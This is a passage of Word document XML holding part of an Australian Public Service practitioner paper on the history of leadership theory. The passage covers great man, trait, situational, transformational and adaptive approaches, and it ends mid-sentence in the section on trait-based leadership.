      <w:r w:rsidRPr="00C855C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>APS Leadership Development Strategy</w:t>
      </w:r>
      <w:r w:rsidR="00C855C1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> launched in 2011</w:t>
      </w:r>
      <w:r w:rsidR="00C855C1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B20BFD">
        <w:t xml:space="preserve">observed </w:t>
      </w:r>
      <w:r w:rsidR="00C855C1">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00750525">
        <w:t>approaches to developing leadership capability are</w:t>
      </w:r>
      <w:r w:rsidR="00C855C1">
        <w:t xml:space="preserve"> inevitably informed by </w:t>
      </w:r>
      <w:r w:rsidR="00750525">
        <w:t xml:space="preserve">the underpinning </w:t>
      </w:r>
      <w:r w:rsidR="00143B4C">
        <w:t>leadership theory</w:t>
      </w:r>
      <w:r w:rsidR="00C855C1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00143B4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A0D09">
        <w:t xml:space="preserve">This paper is designed as a practitioner resource, </w:t>
      </w:r>
      <w:r w:rsidR="00204039">
        <w:t>provid</w:t>
      </w:r>
      <w:r w:rsidR="00AB5AA3">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00204039">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B">
        <w:t>readers</w:t>
      </w:r>
      <w:r w:rsidR="00204039">
        <w:t xml:space="preserve"> with background information on </w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r w:rsidR="00AB5AA3">
        <w:t xml:space="preserve">leadership </w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B">
        <w:t>theor</w:t>
      </w:r>
      <w:r w:rsidR="00AE5F5E">
        <w:t xml:space="preserve">ies </w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t>preceding</w:t>
      </w:r>
      <w:r w:rsidR="00AE5F5E">
        <w:t xml:space="preserve"> and including those underpinning </w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B" w:rsidRPr="00A65A1B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>APS Leadership Development Strategy</w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B25C6">
        <w:t xml:space="preserve">(2011) </w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B">
        <w:t xml:space="preserve">and the </w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B" w:rsidRPr="00A65A1B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>APS Leadership and Core Skills Strategy</w:t>
      </w:r>
      <w:r w:rsidR="00A65A1B">
        <w:t xml:space="preserve"> (2012-13).</w:t>
      </w:r>
      <w:r w:rsidR="00E86D6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001868EA" w:rsidRDefault="001532BF" w:rsidP="007D4C39">
      <w:pPr>
        <w:spacing w:after="840"/>
      </w:pPr>
      <w:r>
        <w:t>Our APS colleagues have a wealth of expertise in the areas of leadership, learning and development, and we welcome your feedback</w:t>
      </w:r>
      <w:r w:rsidR="009C0076">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comments and suggestions.</w:t>
      </w:r>
      <w:r w:rsidR="001868EA" w:rsidDel="001868EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5F4A" w:rsidRDefault="007C5F4A" w:rsidP="007D4C39">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
      <w:r>
        <w:t>A note on sources:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5F4A" w:rsidRPr="000F0534" w:rsidRDefault="007C5F4A" w:rsidP="00A65A1B">
      <w:r>
        <w:t>The National Library of Australia contains almost 12,000 items on leadership</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1742907102"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00204039">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00204039">
            <w:instrText xml:space="preserve"> CITATION Com13 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00204039">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00204039">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00204039" w:rsidRPr="00204039">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Commonwealth of Australia, 2013)</w:t>
          </w:r>
          <w:r w:rsidR="00204039">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AE5F5E">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00AB5AA3">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>he Amazon catalogue include</w:t>
      </w:r>
      <w:r w:rsidR="00C0198B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over 45,000 paperback and 20,000 hardback volumes on the topic</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="773748688"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005B61D8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:instrText xml:space="preserve"> CITATION Ama13 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="005B61D8" w:rsidRPr="005B61D8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Amazon.com, 2013)</w:t>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AE5F5E">
        <w:t>; t</w:t>
      </w:r>
      <w:r w:rsidR="00C0198B">
        <w:t xml:space="preserve">he journal articles </w:t>
      </w:r>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve">and books </w:t>
      </w:r>
      <w:r w:rsidR="00C0198B">
        <w:t>on leadership</w:t>
      </w:r>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve"> identified by Google Scholar numbers almost 1.8 million</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1142887332"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005B61D8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:instrText xml:space="preserve"> CITATION Goo13 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="005B61D8" w:rsidRPr="005B61D8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Google Scholar, 2013)</w:t>
          </w:r>
          <w:r w:rsidR="005B61D8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE5F5E">
        <w:t>With such huge numbers i</w:t>
      </w:r>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve">t is </w:t>
      </w:r>
      <w:r w:rsidR="00AB5AA3">
        <w:t>unfeasible</w:t>
      </w:r>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve"> to review even a small percentage </w:t>
      </w:r>
      <w:r w:rsidR="008E713D">
        <w:t>of these sources</w:t>
      </w:r>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E50F5E">
        <w:t>and unreasonable given</w:t>
      </w:r>
      <w:r w:rsidR="00A12633">
        <w:t xml:space="preserve"> others have </w:t>
      </w:r>
      <w:r w:rsidR="008E713D">
        <w:t xml:space="preserve">completed extensive reviews covering much of </w:t>
      </w:r>
      <w:r w:rsidR="000F24C8">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00EF09C2">
        <w:t xml:space="preserve"> material.</w:t>
      </w:r>
      <w:r w:rsidR="001E5AD8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E50F5E">
        <w:t>Citing approximately 8500 sources, t</w:t>
      </w:r>
      <w:r w:rsidR="001E5AD8">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="001E5AD8" w:rsidRPr="00BC3E70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bass Handbook of Leadership</w:t>
      </w:r>
      <w:r w:rsidR="00EF09C2">
        <w:t xml:space="preserve"> has been particularly useful </w:t>
      </w:r>
      <w:r w:rsidR="001E5AD8">
        <w:t xml:space="preserve">in completing this paper. </w:t>
      </w:r>
      <w:r w:rsidR="00E00018">
        <w:t xml:space="preserve">Heavy use has been made of </w:t>
      </w:r>
      <w:r w:rsidR="004C3718">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00E00018">
        <w:t xml:space="preserve"> source, although effort has been made to extend and complement Bass’ work where necessary and appropriate. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D24E2E" w:rsidRDefault="00D24E2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E37CE" w:rsidRDefault="004C3718" w:rsidP="007D4C39">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc374536611"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="0078086E" w:rsidRDefault="002D47BA" w:rsidP="005C26DE">
      <w:r>
        <w:t xml:space="preserve">Thinking </w:t>
      </w:r>
      <w:r w:rsidR="00F47F2C">
        <w:t>about leadership has been a po</w:t>
      </w:r>
      <w:r w:rsidR="008B313D">
        <w:t>pular pastime for many centuries.</w:t>
      </w:r>
      <w:r w:rsidR="0078086E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E37CE">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00E328D0">
        <w:t xml:space="preserve">is paper traces the development of leadership </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thought </w:t>
      </w:r>
      <w:r w:rsidR="00E328D0">
        <w:t>from the nineteenth century to the present day</w:t>
      </w:r>
      <w:r w:rsidR="00087EF4">
        <w:t xml:space="preserve"> in two parts. The first section spans the period 1840 to 1980, </w:t>
      </w:r>
      <w:r w:rsidR="00B17B29">
        <w:t>while th</w:t>
      </w:r>
      <w:r w:rsidR="008B251A">
        <w:t>e second looks at</w:t>
      </w:r>
      <w:r w:rsidR="00B17B29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B251A">
        <w:t xml:space="preserve">contemporary thinking </w:t>
      </w:r>
      <w:r w:rsidR="00B17B29">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="007D4C39">
        <w:t xml:space="preserve">approximately </w:t>
      </w:r>
      <w:r w:rsidR="00B17B29">
        <w:t>1980 to the present.</w:t>
      </w:r>
      <w:r w:rsidR="008B251A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A4C0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078086E" w:rsidRDefault="001A4C0B" w:rsidP="005C26DE">
      <w:r>
        <w:t xml:space="preserve">The modern study of leadership is generally accepted </w:t>
      </w:r>
      <w:r w:rsidR="00903EB2">
        <w:t xml:space="preserve">as beginning </w:t>
      </w:r>
      <w:r>
        <w:t>around 1840</w:t>
      </w:r>
      <w:r w:rsidR="00903EB2">
        <w:t xml:space="preserve"> with Thomas</w:t>
      </w:r>
      <w:r w:rsidR="002D47BA">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00903EB2">
        <w:t xml:space="preserve">Carlyle’s lecture series </w:t>
      </w:r>
      <w:r w:rsidR="00F73AAA">
        <w:t xml:space="preserve">and subsequent publication of </w:t>
      </w:r>
      <w:r w:rsidR="00F73AAA" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>On Heroes, Hero-worship, and the Heroic in History</w:t>
      </w:r>
      <w:r w:rsidR="00F73AAA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F73AAA">
        <w:t>Carlyle’s leaders were born, not made, and the ‘great man’ theory of leadership was born. Francis Galton extended Carlyle’s work, investigating the hereditary background of leaders and assessing the probability of ‘great’ men having ‘great’ relatives. Challenged as unscientific, great man theory evolved into trait theory, which sought to identify those characteristics and attributes which leaders</w:t>
      </w:r>
      <w:r w:rsidR="001D0202">
        <w:t xml:space="preserve"> were either born</w:t>
      </w:r>
      <w:r w:rsidR="00A31089">
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidR="001D0202">
        <w:t>, or developed.</w:t>
      </w:r>
      <w:r w:rsidR="00AE1C61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C104FC" w:rsidRDefault="00AE1C61" w:rsidP="005C26DE">
      <w:r>
        <w:t xml:space="preserve">With the number of studies multiplying and traits including height and birth order being posited as indicators of leadership ability, </w:t>
      </w:r>
      <w:r w:rsidR="004F3ED3">
        <w:t xml:space="preserve">R </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stogdill’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1948 critique </w:t>
      </w:r>
      <w:r w:rsidR="0078086E">
        <w:t xml:space="preserve">demonstrated the need to consider factors external to the leader in the formulation of leadership theories. </w:t>
      </w:r>
      <w:r w:rsidR="00385804">
        <w:t>In recognition of this</w:t>
      </w:r>
      <w:r w:rsidR="00A31089">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00385804">
        <w:t xml:space="preserve"> situational leadership and contingency theories developed through the </w:t>
      </w:r>
      <w:r w:rsidR="00496815">
        <w:t>mid-twentieth century</w:t>
      </w:r>
      <w:r w:rsidR="00385804">
        <w:t xml:space="preserve">, offering leaders advice on how best to adapt either their own leadership approach or other situational variables respectively, to achieve optimal outcomes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE7F0C" w:rsidRDefault="00662C1C" w:rsidP="005C26DE">
      <w:r>
        <w:t>Approaching leadership through the study</w:t>
      </w:r>
      <w:r w:rsidR="003B4721">
        <w:t xml:space="preserve"> of political leaders, </w:t>
      </w:r>
      <w:r w:rsidR="00162C2E">
        <w:t xml:space="preserve">in 1978 </w:t>
      </w:r>
      <w:r w:rsidR="00EE7F0C">
        <w:t xml:space="preserve">James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE7F0C">
        <w:t>MacGregor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE7F0C">
        <w:t xml:space="preserve"> Burns</w:t>
      </w:r>
      <w:r w:rsidR="003B4721">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE7F0C">
        <w:t xml:space="preserve">described two contrasting two modes of leadership – transactional and transformational. At its most simple transactional leadership is the promise of reward for work, while transformational leaders approach their work from a more altruistic perspective, seeking to truly engage their followers and motivate them to higher levels of performance. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A31089" w:rsidRDefault="008C339F" w:rsidP="005C26DE">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00873B5F">
        <w:t xml:space="preserve">eadership </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thought </w:t>
      </w:r>
      <w:r w:rsidR="00873B5F">
        <w:t xml:space="preserve">has evolved </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in a less linear manner </w:t>
      </w:r>
      <w:r w:rsidR="00873B5F">
        <w:t xml:space="preserve">over the past </w:t>
      </w:r>
      <w:r w:rsidR="007D4C39">
        <w:t xml:space="preserve">thirty </w:t>
      </w:r>
      <w:r w:rsidR="00873B5F">
        <w:t xml:space="preserve">or so years. Rather than seeking </w:t>
      </w:r>
      <w:r w:rsidR="007B5FB9">
        <w:t xml:space="preserve">‘one true theory’ </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="007B5FB9">
        <w:t xml:space="preserve"> leadership, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">work has explored </w:t>
      </w:r>
      <w:r w:rsidR="004419D2">
        <w:t xml:space="preserve">the idea of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leadership from different perspectives. These </w:t>
      </w:r>
      <w:r w:rsidR="004419D2">
        <w:t xml:space="preserve">perspectives </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have included the person-centred idea of authentic leadership </w:t>
      </w:r>
      <w:r w:rsidR="00AA7974">
        <w:t xml:space="preserve">as well as </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E2584D">
        <w:t>types of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leadership </w:t>
      </w:r>
      <w:r w:rsidR="00E2584D">
        <w:t xml:space="preserve">approaches </w:t>
      </w:r>
      <w:r>
        <w:t>needed to work</w:t>
      </w:r>
      <w:r w:rsidR="00E2584D">
        <w:t xml:space="preserve"> successfully</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with complexity and ambiguity, and within systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163727" w:rsidRDefault="00E2584D" w:rsidP="005C26DE">
      <w:r>
        <w:t>Proponents of ‘adaptive leadership’ approach leadership as a practice rather than a</w:t>
      </w:r>
      <w:r w:rsidR="00B019BB">
        <w:t xml:space="preserve"> hierarchical position</w:t>
      </w:r>
      <w:r>
        <w:t>, while researchers into complexity leadership explore the operation of complex adaptive systems within bureaucratic organisations. The term ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>neuroleadership</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ has been coined to describe the application of the science of neurology to the practice of leadership. </w:t>
      </w:r>
      <w:r w:rsidR="00D85AB7">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00C104FC">
        <w:t>he</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se </w:t>
      </w:r>
      <w:r w:rsidR="00D85AB7">
        <w:t xml:space="preserve">recent </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">perspectives </w:t>
      </w:r>
      <w:r w:rsidR="007758C1">
        <w:t xml:space="preserve">inform the </w:t>
      </w:r>
      <w:r w:rsidR="007758C1" w:rsidRPr="005C26DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>APS Leadership Development Strategy</w:t>
      </w:r>
      <w:r w:rsidR="007758C1">
        <w:t xml:space="preserve"> (2011) and</w:t>
      </w:r>
      <w:r w:rsidR="00163727">
        <w:t xml:space="preserve"> resul</w:t>
      </w:r>
      <w:r w:rsidR="004419D2">
        <w:t>ting</w:t>
      </w:r>
      <w:r w:rsidR="00163727">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007758C1">
        <w:t xml:space="preserve">talent and leadership development </w:t>
      </w:r>
      <w:r w:rsidR="00163727">
        <w:t>activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A67DE2" w:rsidRPr="005C26DE" w:rsidRDefault="00A67DE2" w:rsidP="007D4C39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B689D" w:rsidRDefault="001B689D" w:rsidP="007D4C39">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc374536612"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Theories of leadership – 1840 to 1980</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00E86D6A" w:rsidRPr="00E86D6A" w:rsidRDefault="00E86D6A" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc374536613"/>
      <w:r w:rsidRPr="004464C0">
        <w:t>Trait</w:t>
      </w:r>
      <w:r>
        <w:t>-based leadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRPr="00A67DE2" w:rsidRDefault="00CD6B5D" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r w:rsidRPr="00A67DE2">
        <w:t>Nineteenth century ‘great man’ theories argued that great leaders are born, not made.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRDefault="00CD6B5D" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t>Trai</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> theory argues certain characteristics and attributes are peculiar to leaders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5329" w:rsidRDefault="00E403C5" w:rsidP="0016591B">
      <w:r>
        <w:t xml:space="preserve">Trait-based leadership theories </w:t>
      </w:r>
      <w:r w:rsidR="00CA39E5">
        <w:t>comprise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> two major s</w:t>
      </w:r>
      <w:r w:rsidR="005B61D8">
        <w:t>chools</w:t>
      </w:r>
      <w:r w:rsidR="00B20BFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5329">
        <w:t>– the ‘great man</w:t>
      </w:r>
      <w:r w:rsidR="00E328D0">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="008B5329">
        <w:t xml:space="preserve"> theories of leadership, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008B5329">
        <w:t>that great leaders</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B5329">
        <w:t xml:space="preserve"> are born and not made, and trait</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t xml:space="preserve"> theory</w:t>
      </w:r>
      <w:r w:rsidR="00CD6B5D">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="008B5329">
        <w:t>that certain</w:t>
      </w:r>
      <w:r w:rsidR="00685E23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5329">
        <w:t xml:space="preserve">traits (whether inherited or developed) are preconditions for effective leadership. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E23" w:rsidRPr="005D3C1A" w:rsidRDefault="00724923" w:rsidP="005D3C1A">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="0087099C">
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reat man’ theorists </w:t>
      </w:r>
      <w:r w:rsidR="0087099C">
        <w:t xml:space="preserve">saw history </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t>as shaped by the leadership of great men</w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1367639833"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00A732D5" w:rsidRPr="005D3C1A">
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B6102C" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00646D8F">
        <w:t xml:space="preserve">Key </w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t xml:space="preserve">writers </w:t>
      </w:r>
      <w:r w:rsidR="00646D8F">
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t>Thomas Carlyle and Francis</w:t>
      </w:r>
      <w:r w:rsidR="00D2316C" w:rsidRPr="005D3C1A">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">Galton. Carlyle’s </w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t>1840</w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">lecture series and subsequent </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">essay </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>On Heroes</w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Hero</w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-w</w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>orship</w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="009C3B8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>, and the Heroic in History</w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">painted the </w:t>
      </w:r>
      <w:r w:rsidR="00171B13" w:rsidRPr="005D3C1A">
        <w:t>great</w:t>
      </w:r>
      <w:r w:rsidR="009C3B8E">
        <w:t xml:space="preserve"> ma</w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t>n as</w:t>
      </w:r>
      <w:r w:rsidR="00171B13" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> possessed of </w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t>divinely given</w:t>
      </w:r>
      <w:r w:rsidR="00171B13" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A732D5" w:rsidRPr="005D3C1A">
        <w:t>features</w:t>
      </w:r>
